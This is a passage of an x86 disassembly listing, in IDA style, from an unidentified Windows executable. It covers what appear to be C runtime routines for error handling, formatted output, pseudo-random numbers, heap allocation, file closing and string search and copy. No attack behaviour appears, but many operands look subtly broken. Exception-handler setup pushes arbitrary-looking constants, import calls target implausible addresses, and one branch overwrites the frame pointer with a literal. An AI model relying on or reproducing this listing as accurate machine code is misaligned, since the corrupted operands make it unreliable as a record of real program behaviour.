push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
cmp [ebp+arg_8], edi
jz short loc_402F89
cmp [ebp+arg_4], esi
jnb short loc_402FE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402F93
; ---------------------------------------------------------------------------
loc_402FE6: ; CODE XREF: sub_402F72+64�j
push 16h
pop eax
loc_402FE9: ; CODE XREF: sub_402F72+10�j
; sub_402F72+30�j
pop edi
pop esi
pop ebp
retn
sub_402F72 endp
; =============== S U B R O U T I N E =======================================
sub_402FED proc near ; CODE XREF: seg000:00402FFE�p
push ecx
mov dword ptr [ecx], offset off_41D38C
call sub_407F55
pop ecx
retn
sub_402FED endp
; ---------------------------------------------------------------------------
loc_402FFB: ; DATA XREF: seg001:off_41D38C�o
push esi
mov esi, ecx
call sub_402FED
test byte ptr [esp+8], 1
jz short loc_403011
push esi
call sub_402F6D
pop ecx
loc_403011: ; CODE XREF: seg000:00403008�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_403017 proc near ; CODE XREF: sub_40BA07+12D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add ecx, 9
push ecx
add eax, 9
push eax
call sub_407FD0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
sub_403017 endp
; =============== S U B R O U T I N E =======================================
sub_403032 proc near ; CODE XREF: sub_40304B+3B�p
push esi
push 1
push 3FBB65h
mov esi, ecx
call sub_402C5A
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn
sub_403032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40304B proc near ; CODE XREF: sub_401291+5�p
; sub_401395+5�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
jmp short loc_403060
; ---------------------------------------------------------------------------
loc_403053: ; CODE XREF: sub_40304B+20�j
push [ebp+arg_0]
call sub_408062
test eax, eax
pop ecx
jz short loc_40306F
loc_403060: ; CODE XREF: sub_40304B+6�j
push [ebp+arg_0]
call sub_4036E0
test eax, eax
pop ecx
jz short loc_403053
leave
retn
; ---------------------------------------------------------------------------
loc_40306F: ; CODE XREF: sub_40304B+13�j
test byte ptr ds:dword_425A90, 1
mov esi, 0CDFDDBh
jnz short loc_403096
or ds:dword_425A90, 1
mov ecx, esi
call sub_403032
push 66FEEDh
call sub_402E21
pop ecx
loc_403096: ; CODE XREF: sub_40304B+30�j
push esi
lea ecx, [ebp+var_C]
call sub_402C72
push 737F76h
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
sub_40304B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030B5 proc near ; CODE XREF: sub_4190BD+84�p
; sub_4190BD+102�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
jnz short loc_4030E0
loc_4030C3: ; CODE XREF: sub_4030B5+30�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40312D
; ---------------------------------------------------------------------------
loc_4030E0: ; CODE XREF: sub_4030B5+C�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4030C3
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
call sub_4069D7
add esp, 10h
dec [ebp+var_1C]
mov esi, eax
js short loc_40311E
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40312A
; ---------------------------------------------------------------------------
loc_40311E: ; CODE XREF: sub_4030B5+60�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40312A: ; CODE XREF: sub_4030B5+67�j
mov eax, esi
pop esi
loc_40312D: ; CODE XREF: sub_4030B5+29�j
pop ebx
leave
retn
sub_4030B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403130 proc near ; CODE XREF: sub_4031F4+A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push 79BFBBh
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov edi, [ebp+arg_0]
cmp edi, ebx
setnz al
cmp eax, ebx
jnz short loc_40316B
loc_40314F: ; CODE XREF: sub_403130+47�j
; sub_403130+52�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
loc_403167: ; CODE XREF: sub_403130+6B�j
; sub_403130+92�j
xor eax, eax
jmp short loc_4031E4
; ---------------------------------------------------------------------------
loc_40316B: ; CODE XREF: sub_403130+1D�j
xor eax, eax
mov esi, [ebp+arg_4]
cmp esi, ebx
setnz al
cmp eax, ebx
jz short loc_40314F
xor eax, eax
cmp [esi], bl
setnz al
cmp eax, ebx
jz short loc_40314F
call sub_4084A1
mov [ebp+arg_0], eax
cmp eax, ebx
jnz short loc_40319D
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_40319D: ; CODE XREF: sub_403130+5E�j
mov [ebp+ms_exc.disabled], ebx
cmp [edi], bl
jnz short loc_4031C4
call sub_4057D3
mov dword ptr [eax], 16h
push 0FFFFFFFEh
lea eax, [ebp+ms_exc.prev_er]
push eax
push 7CDFDDh
call sub_4085C8
add esp, 0Ch
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_403130+72�j
push eax
push [ebp+arg_8]
push esi
push edi
call sub_4081FF
add esp, 10h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4031EA
mov eax, [ebp+var_1C]
loc_4031E4: ; CODE XREF: sub_403130+39�j
call __SEH_epilog4
retn
sub_403130 endp
; =============== S U B R O U T I N E =======================================
sub_4031EA proc near ; CODE XREF: sub_403130+AC�p
; DATA XREF: seg001:00421360�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_4031EA endp
; =============== S U B R O U T I N E =======================================
sub_4031F4 proc near ; CODE XREF: sub_4190BD+116�p
; sub_41B3D0+4E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_403130
add esp, 0Ch
retn
sub_4031F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403207 proc near ; CODE XREF: sub_4190BD+131�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 0Ch
push 3E6FEEh
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov esi, [ebp+arg_0]
cmp esi, ebx
setnz al
cmp eax, ebx
jnz short loc_403246
loc_403226: ; CODE XREF: sub_403207+49�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403346
; ---------------------------------------------------------------------------
loc_403246: ; CODE XREF: sub_403207+1D�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
cmp eax, ebx
jz short loc_403226
mov [ebp+arg_0], esi
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], ebx
test byte ptr [esi+0Ch], 40h
jnz loc_40330F
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032A3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032A3
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032A8
; ---------------------------------------------------------------------------
loc_4032A3: ; CODE XREF: sub_403207+6C�j
; sub_403207+78�j
mov edi, 4EF9BFh
loc_4032A8: ; CODE XREF: sub_403207+9A�j
test byte ptr [eax+24h], 7Fh
jnz short loc_4032F3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032E8
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032E8
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032ED
; ---------------------------------------------------------------------------
loc_4032E8: ; CODE XREF: sub_403207+B1�j
; sub_403207+BD�j
mov ebp, 493BE6h
loc_4032ED: ; CODE XREF: sub_403207+DF�j
test byte ptr [eax+24h], 80h
jz short loc_40330F
loc_4032F3: ; CODE XREF: sub_403207+A5�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or [ebp+var_1C], 0FFFFFFFFh
loc_40330F: ; CODE XREF: sub_403207+5C�j
; sub_403207+EA�j
cmp [ebp+var_1C], ebx
jnz short loc_403337
push esi
call sub_40871B
mov edi, eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
push esi
call sub_4069D7
mov [ebp+var_1C], eax
push esi
push edi
call sub_4087B1
add esp, 1Ch
loc_403337: ; CODE XREF: sub_403207+10B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40334C
mov eax, [ebp+var_1C]
loc_403346: ; CODE XREF: sub_403207+3A�j
call __SEH_epilog4
retn
sub_403207 endp
; =============== S U B R O U T I N E =======================================
sub_40334C proc near ; CODE XREF: sub_403207+137�p
; DATA XREF: seg001:00421380�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_40334C endp
; =============== S U B R O U T I N E =======================================
sub_403356 proc near ; CODE XREF: sub_41748B+4F�p
; sub_41A9DE+20F�p
arg_0 = dword ptr 4
call sub_40539D
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_403356 endp
; =============== S U B R O U T I N E =======================================
sub_403363 proc near ; CODE XREF: sub_41748B:loc_417607�p
; sub_4190BD+A7�p ...
call sub_40539D
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_403363 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403385 proc near ; CODE XREF: sub_403436+12�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_4033B3
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403433
; ---------------------------------------------------------------------------
loc_4033B3: ; CODE XREF: sub_403385+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_4033DF
cmp esi, ebx
jnz short loc_4033DF
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_403432
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_403385+37�j
; sub_403385+3B�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_4033EE
mov [ebp+var_1C], ecx
loc_4033EE: ; CODE XREF: sub_403385+64�j
push edi
push [ebp+arg_10]
lea eax, [ebp+var_20]
push [ebp+arg_C]
mov [ebp+var_14], 42h
push [ebp+arg_8]
mov [ebp+var_18], esi
push eax
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_403431
dec [ebp+var_1C]
js short loc_403423
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40342F
; ---------------------------------------------------------------------------
loc_403423: ; CODE XREF: sub_403385+95�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40342F: ; CODE XREF: sub_403385+9C�j
mov eax, edi
loc_403431: ; CODE XREF: sub_403385+90�j
pop edi
loc_403432: ; CODE XREF: sub_403385+58�j
pop esi
loc_403433: ; CODE XREF: sub_403385+29�j
pop ebx
leave
retn
sub_403385 endp
; =============== S U B R O U T I N E =======================================
sub_403436 proc near ; CODE XREF: sub_4172CC+3E�p
; sub_417361+7C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push 0
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_403385
add esp, 14h
retn
sub_403436 endp
; =============== S U B R O U T I N E =======================================
sub_403451 proc near ; CODE XREF: sub_4034C4+5A�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
or ebx, 0FFFFFFFFh
cmp esi, edi
jnz short loc_40347E
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4034C0
; ---------------------------------------------------------------------------
loc_40347E: ; CODE XREF: sub_403451+E�j
test byte ptr [esi+0Ch], 83h
jz short loc_4034BB
push esi
call sub_408BDA
push esi
mov ebx, eax
call sub_408BAE
push esi
call sub_408A20
push eax
call sub_408AE1
add esp, 10h
test eax, eax
jge short loc_4034AA
or ebx, 0FFFFFFFFh
jmp short loc_4034BB
; ---------------------------------------------------------------------------
loc_4034AA: ; CODE XREF: sub_403451+52�j
mov eax, [esi+1Ch]
cmp eax, edi
jz short loc_4034BB
push eax
call sub_403603
pop ecx
mov [esi+1Ch], edi
loc_4034BB: ; CODE XREF: sub_403451+31�j
; sub_403451+57�j ...
mov [esi+0Ch], edi
mov eax, ebx
loc_4034C0: ; CODE XREF: sub_403451+2B�j
pop edi
pop esi
pop ebx
retn
sub_403451 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034C4 proc near ; CODE XREF: sub_40DFD3+43�p
; sub_4190BD+137�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 2C9DF3h
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor eax, eax
mov esi, [ebp+arg_0]
xor edi, edi
cmp esi, edi
setnz al
cmp eax, edi
jnz short loc_403501
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40350D
; ---------------------------------------------------------------------------
loc_403501: ; CODE XREF: sub_4034C4+1E�j
test byte ptr [esi+0Ch], 40h
jz short loc_403513
mov [esi+0Ch], edi
loc_40350A: ; CODE XREF: sub_4034C4+6F�j
mov eax, [ebp+var_1C]
loc_40350D: ; CODE XREF: sub_4034C4+3B�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403513: ; CODE XREF: sub_4034C4+41�j
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], edi
push esi
call sub_403451
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403538
jmp short loc_40350A
sub_4034C4 endp
; =============== S U B R O U T I N E =======================================
sub_403535 proc near ; DATA XREF: seg001:004213A0�o
mov esi, [ebp+8]
sub_403535 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403538 proc near ; CODE XREF: sub_4034C4+6A�p
push esi
call sub_4081AD
pop ecx
retn
sub_403538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403540 proc near ; CODE XREF: seg000:004192C0�p
; sub_4192FB+13�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call dword ptr ds:564EF9h
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 6B277Ch
adc ecx, 0FE624E21h
push ecx
push eax
call sub_408D70
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_40357A
mov [ecx], eax
mov [ecx+4], edx
locret_40357A: ; CODE XREF: sub_403540+33�j
leave
retn
sub_403540 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40357C proc near ; CODE XREF: sub_4035E4+15�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push esi
call sub_404130
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_4035AD
loc_403590: ; CODE XREF: sub_40357C+34�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4035E1
; ---------------------------------------------------------------------------
loc_4035AD: ; CODE XREF: sub_40357C+12�j
cmp [ebp+arg_4], edi
jz short loc_403590
mov ecx, 7FFFFFFFh
cmp eax, ecx
mov [ebp+var_14], 49h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
mov [ebp+var_1C], ecx
ja short loc_4035CE
mov [ebp+var_1C], eax
loc_4035CE: ; CODE XREF: sub_40357C+4D�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call [ebp+arg_0]
add esp, 10h
loc_4035E1: ; CODE XREF: sub_40357C+2F�j
pop edi
leave
retn
sub_40357C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4035E4 proc near ; CODE XREF: sub_401F1C+22E�p
; sub_401F1C+36B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
lea eax, [esp+4+arg_8]
push eax
push 0
push [esp+0Ch+arg_4]
push 3593BEh
call sub_40357C
add esp, 10h
pop esi
retn
sub_4035E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403603 proc near ; CODE XREF: sub_402CCA+F�p sub_402F6D�j ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00403662 SIZE 0000002F BYTES
push 0Ch
push 1AC9DFh
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_40368B
cmp ds:dword_434DF4, 3
jnz short loc_403662
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_405B25
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_403642
push esi
push eax
call sub_405B50
pop ecx
pop ecx
loc_403642: ; CODE XREF: sub_403603+34�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403659
cmp [ebp+var_1C], 0
jnz short loc_40368B
push [ebp+arg_0]
jmp short loc_403663
sub_403603 endp
; =============== S U B R O U T I N E =======================================
sub_403659 proc near ; CODE XREF: sub_403603+46�p
; DATA XREF: seg001:004213C0�o
push 4
call sub_40591F
pop ecx
retn
sub_403659 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_403603
loc_403662: ; CODE XREF: sub_403603+1A�j
push esi
loc_403663: ; CODE XREF: sub_403603+54�j
push 0
push ds:dword_425F68
call dword ptr ds:0D64EFh
test eax, eax
jnz short loc_40368B
call sub_4057D3
mov esi, eax
call dword ptr ds:6B277h
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40368B: ; CODE XREF: sub_403603+11�j
; sub_403603+4F�j ...
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_403603
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403691 proc near ; CODE XREF: sub_4036E0+59�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset byte_43593B
call __SEH_prolog4
and [ebp+var_1C], 0
mov esi, [ebp+arg_0]
cmp esi, ds:dword_434DE4
ja short loc_4036CE
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4036D7
loc_4036CE: ; CODE XREF: sub_403691+19�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_403691 endp
; =============== S U B R O U T I N E =======================================
sub_4036D7 proc near ; CODE XREF: sub_403691+38�p
; DATA XREF: seg001:004213E0�o
push 4
call sub_40591F
pop ecx
retn
sub_4036D7 endp
; =============== S U B R O U T I N E =======================================
sub_4036E0 proc near ; CODE XREF: sub_402C0C+1F�p
; sub_402C72+2A�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
cmp ebp, 0FFFFFFE0h
ja loc_40378D
push ebx
mov ebx, ds:dword_41D114
push esi
push edi
loc_4036F7: ; CODE XREF: sub_4036E0+94�j
xor esi, esi
cmp ds:dword_425F68, esi
mov edi, ebp
jnz short loc_40371B
call sub_409C54
push 1Eh
call sub_409AB4
push 21AC9Dh
call sub_4078A7
pop ecx
pop ecx
loc_40371B: ; CODE XREF: sub_4036E0+21�j
mov eax, ds:dword_434DF4
cmp eax, 1
jnz short loc_403733
cmp ebp, esi
jz short loc_40372D
mov eax, ebp
jmp short loc_403730
; ---------------------------------------------------------------------------
loc_40372D: ; CODE XREF: sub_4036E0+47�j
xor eax, eax
inc eax
loc_403730: ; CODE XREF: sub_4036E0+4B�j
push eax
jmp short loc_403751
; ---------------------------------------------------------------------------
loc_403733: ; CODE XREF: sub_4036E0+43�j
cmp eax, 3
jnz short loc_403743
push ebp
call sub_403691
cmp eax, esi
pop ecx
jnz short loc_40375A
loc_403743: ; CODE XREF: sub_4036E0+56�j
cmp ebp, esi
jnz short loc_40374A
xor edi, edi
inc edi
loc_40374A: ; CODE XREF: sub_4036E0+65�j
add edi, 0Fh
and edi, 0FFFFFFF0h
push edi
loc_403751: ; CODE XREF: sub_4036E0+51�j
push esi
push ds:dword_425F68
call ebx
loc_40375A: ; CODE XREF: sub_4036E0+61�j
mov esi, eax
test esi, esi
jnz short loc_403786
cmp ds:dword_4262EC, eax
push 0Ch
pop edi
jz short loc_403778
push ebp
call sub_408062
test eax, eax
pop ecx
jnz short loc_4036F7
jmp short loc_40377F
; ---------------------------------------------------------------------------
loc_403778: ; CODE XREF: sub_4036E0+89�j
call sub_4057D3
mov [eax], edi
loc_40377F: ; CODE XREF: sub_4036E0+96�j
call sub_4057D3
mov [eax], edi
loc_403786: ; CODE XREF: sub_4036E0+7E�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40378D: ; CODE XREF: sub_4036E0+8�j
push ebp
call sub_408062
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
pop ebp
retn
sub_4036E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4037B0 proc near ; CODE XREF: sub_41783D+84�p
; sub_4184BF+1B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_403830
mov dh, [ecx+1]
test dh, dh
jz short loc_40381D
loc_4037C8: ; CODE XREF: sub_4037B0+58�j
; sub_4037B0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_4037EE
test al, al
jz short loc_4037E8
loc_4037DB: ; CODE XREF: sub_4037B0+36�j
mov al, [esi]
add esi, 1
loc_4037E0: ; CODE XREF: sub_4037B0+45�j
cmp al, dl
jz short loc_4037EE
test al, al
jnz short loc_4037DB
loc_4037E8: ; CODE XREF: sub_4037B0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4037EE: ; CODE XREF: sub_4037B0+25�j
; sub_4037B0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_4037E0
lea edi, [esi-1]
loc_4037FA: ; CODE XREF: sub_4037B0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_403829
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4037C8
mov al, [ecx+3]
test al, al
jz short loc_403829
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4037FA
jmp short loc_4037C8
; ---------------------------------------------------------------------------
loc_40381D: ; CODE XREF: sub_4037B0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_403856
; ---------------------------------------------------------------------------
loc_403829: ; CODE XREF: sub_4037B0+4F�j
; sub_4037B0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_403830: ; CODE XREF: sub_4037B0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4037B0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_403850
loc_403840: ; CODE XREF: sub_403850+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_403850
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403850 proc near ; CODE XREF: sub_41837F+B�p
; sub_418396+35�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00403840 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_403856: ; CODE XREF: sub_4037B0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40387D
loc_403868: ; CODE XREF: sub_403850+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_403840
test cl, cl
jz short loc_4038C6
test edx, 3
jnz short loc_403868
loc_40387D: ; CODE XREF: sub_403850+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_403888: ; CODE XREF: sub_403850+63�j
; sub_403850+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4038CA
and eax, 81010100h
jz short loc_403888
and eax, 1010100h
jnz short loc_4038C4
and esi, 80000000h
jnz short loc_403888
loc_4038C4: ; CODE XREF: sub_403850+6A�j
; sub_403850+83�j ...
pop esi
pop edi
loc_4038C6: ; CODE XREF: sub_403850+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4038CA: ; CODE XREF: sub_403850+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_403907
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_403900
test ah, ah
jz short loc_4038C4
shr eax, 10h
cmp al, bl
jz short loc_4038F9
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_4038F2
test ah, ah
jz short loc_4038C4
jmp short loc_403888
; ---------------------------------------------------------------------------
loc_4038F2: ; CODE XREF: sub_403850+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4038F9: ; CODE XREF: sub_403850+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403900: ; CODE XREF: sub_403850+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403907: ; CODE XREF: sub_403850+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_403850 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403910 proc near ; CODE XREF: sub_417676+104�p
; sub_41783D+D9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4039AF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_40393C
shr ecx, 2
jnz loc_4039BF
jmp short loc_403963
; ---------------------------------------------------------------------------
loc_40393C: ; CODE XREF: sub_403910+1F�j
; sub_403910+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_403976
test al, al
jz short loc_40397E
